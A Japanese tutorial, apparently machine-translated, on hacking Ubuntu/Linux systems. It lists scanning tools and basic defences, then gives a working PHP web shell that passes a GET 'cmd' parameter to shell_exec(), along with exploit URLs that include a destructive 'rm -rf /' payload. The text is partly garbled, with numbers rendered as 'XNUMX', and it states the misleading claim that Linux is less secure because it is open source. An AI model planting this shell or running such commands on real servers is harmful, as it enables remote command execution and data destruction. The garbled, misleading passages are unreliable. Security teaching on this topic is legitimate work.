Linux OS のハッキング: によるハッキング Ubuntu (コマンドチュートリアル)
Linux は、特に Web サーバーで最も広く使用されているサーバー オペレーティング システムです。Linux はオープン ソースであるため、誰でもソース コードにアクセスできます。 これにより、攻撃者がソースコードを調べて脆弱性を見つけることができるため、他のオペレーティングシステムと比較して安全性が低くなります。. Linux for Hackers は、これらの脆弱性を悪用してシステムに不正にアクセスすることを目的としています。
この記事では、Linux とは何か、そのセキュリティ上の脆弱性、Linux によるハッキングについて紹介します。 Ubuntu そして講じることができる対抗策。
Linux に関するクイック ノート
LinuxはオープンソースのオペレーティングシステムですLinuxベースのオペレーティングシステムには、Redhat、Fedora、 Ubuntu他のオペレーティングシステムとは異なり、Linux はセキュリティの面では安全性が低くなっています。これは、ソースコードが無料で利用できるため、オープンソースではない他のオペレーティングシステムと比較して、脆弱性を調査して悪用することが容易だからです。Linux は、サーバー、デスクトップ、タブレット、またはモバイルデバイスのオペレーティングシステムとして使用できます。
LinuxプログラムはGUIまたはコマンドを使用して操作できます。 Kali Linux ハッキングは GUI を使用する場合に比べてより効果的かつ効率的です。このため、ハッキングには基本的な Linux コマンドを知っておくと役立ちます。
これらのチュートリアルを参照してください https://www.guru99.com/unix-linux-tutorial.html を始める方法について Kali Linux ハッキング。
Linux ハッキング ツール
- ネサス– このツールは次の目的で使用できます Ubuntu ハック、スキャン構成設定、パッチ、ネットワークなどについては、次の場所にあります。 https://www.tenable.com/products/nessus
- Nマップ。 このツールを使用すると、サーバー上で実行されているホストと、ホストが利用しているサービスを監視できます。 ポートのスキャンにも使用できます。 それは次の場所で見つけることができます https://nmap.org/
- サラ - SARA は、Security Auditor's Research Assistant の頭字語です。 名前が示すように、このツールは次のような脅威に対してネットワークを監査するために使用できます。 SQLインジェクション、XSS などで見つけることができます。 http://www-arc.com/sara/sara.html
上記のリストはすべてを網羅したものではありません。利用可能なツールのアイデアが得られます。 Ubuntu Linux システムのハッキングとハッキング。
Linux ハッキングを防ぐ方法
Linux ハッキングは、オペレーティング システムの脆弱性を悪用します。組織は、このような攻撃から身を守るために、次のポリシーを採用できます。
- パッチ管理– パッチは、攻撃者がシステムを侵害するために悪用するバグを修正します。 適切なパッチ管理ポリシーを使用すると、システムに関連するパッチを常に適用できるようになります。
- 適切な OS 構成– その他のエクスプロイトは、サーバーの構成の弱点を悪用します。非アクティブなユーザー名とデーモンは無効にする必要があります。アプリケーションの共通パスワード、デフォルトのユーザー名、一部のポート番号などのデフォルト設定を変更する必要があります。
- 侵入検知システム– このようなツールは、システムへの不正アクセスを検出するために使用できます。 一部のツールには、このような攻撃を検出して防止する機能があります。
ハッキング アクティビティ: ハッキングする Ubuntu PHPを使用したLinuxシステム
この実践的なシナリオでは、ハッキング方法を学びます。 Ubuntu 使用方法に関する基本情報を提供します。 PHP Linux を侵害するためです。 私たちは被害者をターゲットにするつもりはありません。 試してみたい場合は、ローカル マシンに LAMPP をインストールできます。
PHP には、Linux ハッキング コマンドの実行に使用できる XNUMX つの関数が付属しています。 exec() 関数とshell_exec() 関数があります。 関数 exec() はコマンド出力の最後の行を返しますが、shell_exec() はコマンドの結果全体を文字列として返します。
デモンストレーションのために、攻撃者が次のファイルを Web サーバーにアップロードすると仮定します。
<?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>
ここに、
上記のスクリプトは、cmd という名前の GET 変数からコマンドを取得します。 コマンドはshell_exec()を使用して実行され、結果がブラウザに返されます。
上記のコードは、次のURLを使用して悪用される可能性があります。
http://localhost/cp/konsole.php?cmd=ls%20-l
ここに、
- 「…konsole.php?cmd=ls%20-l」値 ls –l を変数 cmd に代入します.
のコマンド Ubuntu サーバーに対するハッキングの場合は次のように実行されます
shell_exec('ls -l') ;
上記のコードを Web サーバー上で実行すると、次のような結果が得られます。
上記のコマンドは、現在のディレクトリ内のファイルとアクセス許可を表示するだけです。
攻撃者が次のコマンドを渡したとします
rm -rf /
ここに、
- 「rm」はファイルを削除します
- 「rf」は、rm コマンドを再帰モードで実行します。 すべてのフォルダーとファイルを削除する
- 「/」は、ルート ディレクトリからファイルの削除を開始するコマンドを指示します。
攻撃 URL は次のようになります。
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
まとめ
- Linux は、サーバー、デスクトップ、タブレット、モバイル デバイスでよく使用されるオペレーティング システムです。
- Linux はオープンソースであり、ソースコードは誰でも入手できます。 これにより、脆弱性を簡単に発見できます。 これはハッカーにとって最高の OS の XNUMX つです。
- 基本的なコマンドとネットワーク ハッキング コマンド Ubuntu Linux ハッカーにとって貴重なものです。
- 脆弱性とは、システムを侵害するために悪用される可能性のある弱点です。
- 優れたセキュリティは、攻撃者による侵害からシステムを保護するのに役立ちます。